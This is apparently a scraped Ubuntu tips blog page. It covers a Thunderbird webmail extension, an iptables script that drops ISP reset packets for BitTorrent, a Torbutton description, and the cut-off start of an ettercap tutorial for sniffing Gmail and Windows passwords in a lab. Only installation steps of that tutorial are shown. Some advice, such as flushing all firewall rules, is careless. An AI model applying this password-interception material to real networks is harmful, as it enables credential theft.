MailDotCom
Mail.com Email.com Journalism.com Iname.com scientist.com earthling.net techie.com usa.com post.com witty.com whoever.com writeme.com unforgettable.com teacher.com 
Gmail
gmail.com 
Libero
libero.it iol.it blu.it 
AOL
aol.com aim.com netscape.com netscape.net
First lets grab thunderbird email client, click here to have apt install it in firefox or simply do:
sudo apt-get install thunderbird
Now once that is installed lets grab a few extentions for thunderbird.
Right click and save Webmail Extention to your desktop:
WebMail Extention
Open up thunderbird and click on tools->Addons->Install and select the extention you saved to the desktop.
Now once installed restart Thunderbird and grab the addon's addon from this page.
Here is the yahoo extention, right click save as: Yahoo-1.3.2
Open up thunderbird and click on tools->Addons->Install and select the optional extention you saved to the desktop.
Restart Thunderbird
Now go to the first extension which is the webmail extention, and click on preferences: there you should see the servers
running.
Change the port numbers so they are above 1024 (be sure to change the ports also in your server settings when you create an account.) and then start the services pop and smtp.
Now go add an account and select “Webmail”. Your username is your full yahoo email address. (Probably the port settings are already correct.
Don't download your mail yet!
Go to Extra, Addons, Webmail, Preferences, Domains
There you should see a list of some hotmail domains. If you don't probably the servers are not running (or your firewall is blocking something.)
If the servers are running in the Webmail extension, but you still can't see the domain, then your WebmailData directory has incorrect permissions. Give read, write and execute permissions for your user to the WebmailData directory:
chmod 700 ~
If you have still this problem, try to disable your firewall. As root do:
iptables -F
If you don't have this list: then you will get an error “undefined is a unsupported domain” when you try to download your email. (check your domains and servers as described before)
Otherwhise go to the next step
Click on the preferences button for the Webmail-yahoo extension now. Your account will
normally already be selected. For yahoo mail select “Yahoo (BETA)”
Download your mail, it will ask for a password, type it in and your mail should be
downloaded.
If you get "negative vibes from xxx@yahoo.com": this mostly means that the extension can't understand the website. Make sure you select yahoo beta and if that still doesnt solve the issue, contact the developer
Developer's Site
Howto Search And Replace Text in files Recursively on Ubuntu Linux
I just found a new tool called regexxer, im sure it has been around for a while but I just discovered it.
regexxer is a nifty GUI search/replace tool featuring Perl-style regular expressions. If you need project-wide substitution and you’re tired of hacking sed command lines together, then you should definitely give it a try.
simply apt-get install regexxer
Fix Comcast or University BitTorrent Connection Killing on Ubuntu
I was searching the web for a fix for this fuq'd up problem about Comcast and Universities limiting connections with Sandvine. I have many reasons to believe qwest and other internet service providers are going to start limiting your torrent connections which is bullshit. Bittorrent is indeed hard on ISP's with thousands of syn/ack and tcp connection to and from your computer. I have read BANDWIDTH CHALLENGE TO PUSH LIMITS OF TECHNOLOGY and it seems bandwidth is surpassing technology and ISP's need to upgrade, but anyways who's fault is that? Not ours, screw them!
Here is a script that will block the RST packets that reset your connections:
1) open a terminal
2) sudo -s
3) cd /etc/init.d/
4) type cat >>bitfix
5) paste script below:
#!/bin/sh
#Replace 6883 with you Bittorent Port
BT_PORT=6883
#Flush the filters
iptables -F
#Apply new filters
iptables -A INPUT -i lo -j ACCEPT
#Comcast BitTorrent seeding block workaround
iptables -A INPUT -p tcp --dport $BT_PORT --tcp-flags RST RST -j DROP
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
#BitTorrent
iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport $BT_PORT -j ACCEPT
iptables -A INPUT -m state --state NEW -m udp -p udp --dport $BT_PORT -j ACCEPT
iptables -A INPUT -j REJECT --reject-with icmp-host-prohibited
exit
6) chmod +x bitfix
7) ./bitfix
Your ipchains firewall is now configured and you should have great upload speed now. You will have to run this script every boot.
I left out the rule to let through established connections, -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
Now you if you use Transmission or any other Bittorent client you may have to edit the port
Transmission uses port 9090
Credits
New torbutton Featured at Blackhat
I was just searching google for some BlackHat pdf's and ran accross a great firefox extention that works with tor. Here are some of the features.. Torbutton is a 1-click way for Firefox users to enable or disable the browser's use of Tor. It adds a panel to the statusbar that says "Tor Enabled" (in green) or "Tor Disabled" (in red). The user may click on the panel to toggle the status. If the user (or some other extension) changes the proxy settings, the change is automatically reflected in the statusbar. Some users may prefer a toolbar button instead of a statusbar panel. Such a button is included, and one adds it to the toolbar by right-clicking on the desired toolbar, selecting "Customize...", and then dragging the Torbutton icon onto the toolbar. There is an option in the preferences to hide the statusbar panel (Tools->Extensions, select Torbutton, and click on Preferences). Newer Firefoxes have the ability to send DNS resolves through the socks proxy, and Torbutton will make use of this feature if it is available in your version of Firefox. The development branch of Torbutton adds several new security features to protect your anonymity from all the major threats the author is aware of. The defaults should be fine for most people, but in case you are the tweaker type, or if you prefer to try to outsource some options to more flexible extensions, here is the complete list. (In an ideal world, these descriptions should all be tooltips in the extension itself, but Firefox bugs 45375 and 218223 currently prevent this). Currently, this is tied to the "Block history writes during Tor" setting. If you have enabled that setting, all formfill functionality (both saving and reading) is disabled. If this bothers you, you can uncheck that option, but both history and forms will be saved. To prevent history disclosure attacks via Non-Tor usage, it is recommended you disable Non-Tor history reads if you allow history writing during Tor. This is a tough one. There are thousands of Firefox extensions: making a complete list of ones that are bad for anonymity is near impossible. However, here are a few examples that should get you started as to what sorts of behavior are dangerous.
This is a c/p right from the developers site:
Download/install hereAbout
Description of Options
FAQ
When I use Tor, Firefox is no longer filling in logins/search boxes for me. Why?
Howto: Sniff Gmail and Windows Passwords with ettercap on Ubuntu Linux
What You Will Need
*A Ubuntu machine to perform the ettercap hackery
*A Windows machine to act as a file server (your virtual Windows XP machine will work)
*Another Windows machine to be a client (your host Windows XP machine will work)
Start Your Ubuntu Virtual Machine
1. Start your Ubuntu machine and log in as usual.
Installing ettercap
2. From the menu bar in the upper left corner of the Ubuntu desktop, click Applications, Add/Remove.
3. In the Add/Remove Applications box, in the Search field, enter ettercap and press the Enter key.
4. When the ettercap application appears, as shown below on this page, check the check box in the Application pane. In the “Apply the following changes?” box, click Apply. Enter your password when you are prom